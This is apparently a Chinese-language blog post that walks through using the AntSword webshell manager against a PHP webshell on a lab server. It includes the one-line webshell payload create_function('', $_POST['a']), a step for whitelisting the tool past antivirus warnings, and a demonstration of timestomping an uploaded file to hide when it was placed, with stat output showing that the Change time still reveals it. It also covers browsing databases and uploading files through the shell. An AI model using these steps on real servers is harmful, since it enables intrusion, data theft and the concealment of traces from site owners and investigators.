PHP webshell後門和代碼審計 中介紹了許多PHP webshell的漏洞利用方式,我們可使用【AntSword蟻劍】對其webshell做更多的操作
安裝
下載後第一時間校驗 md5 值
$ md5sum.exe AntSword-Loader-v4.0.3-win32-x64.zip
85b80052224061e42f685021f28d1975 *AntSword-Loader-v4.0.3-win32-x64.zip
解壓縮AntSword-Loader 後執行 AntSword.exe
首次打開加載器時,界面如下圖所示:
點擊【initialize】按鈕,選擇一個空目錄作為蟻劍的工作目錄,加載器會自動下載源代碼。
AntSword-Loader下載下來的 antSword-master.zip 會被windows 10 防毒跳警告,需加白
加白後如果遇到 Unzip Error Code:[object Object] 錯誤
https://github.com/AntSwordProject/AntSword-Loader/issues/31#issuecomment-869523193 Initialization fails, showing `Unzip Error Code:[object Object]
手動解壓縮 antSword-master.zip ,然後再選擇該目錄
首次打開
添加webshell
以 PHP webshell後門和代碼審計 的 webshell-6.php 為例(1-5實際測試後不行)
create_function('', $_POST['a']);
添加
進入該URL地址即可直接對伺服器上的文件直接做GUI的操作,例如:修改文件時間
原本文件上傳時間是2021-10-08
修改成2020-10-08linux上用ll查,該文件(修改)時間已變成 2020-10-08
[root@localhost /www/wwwroot/webshell.bt (master)]# ll info.php
-rw-r--r--. 1 www www 16 Oct 8 2020 info.php
必須用stat才能查到正確的最後修改時間(Change)
# stat info.php
File: ‘info.php’
Size: 16 Blocks: 8 IO Block: 4096 regular file
Device: fd00h/64768d Inode: 4092920 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 1000/ www) Gid: ( 1000/ www)
Context: unconfined_u:object_r:default_t:s0
Access: 2020-10-08 20:40:50.000000000 +0800
Modify: 2020-10-08 20:40:50.000000000 +0800
Change: 2021-10-08 20:51:11.722462674 +0800
Birth: -
連接資料庫
選定webshell =》右鍵 =》 數據操作
可以選定資料庫和查該庫的資料(比sqlmap注入還強大,所以webshell危害更大)
其他功能
(該資料夾或文件必須是www用戶可寫)
上傳文件,新建資料夾
沒有留言:
張貼留言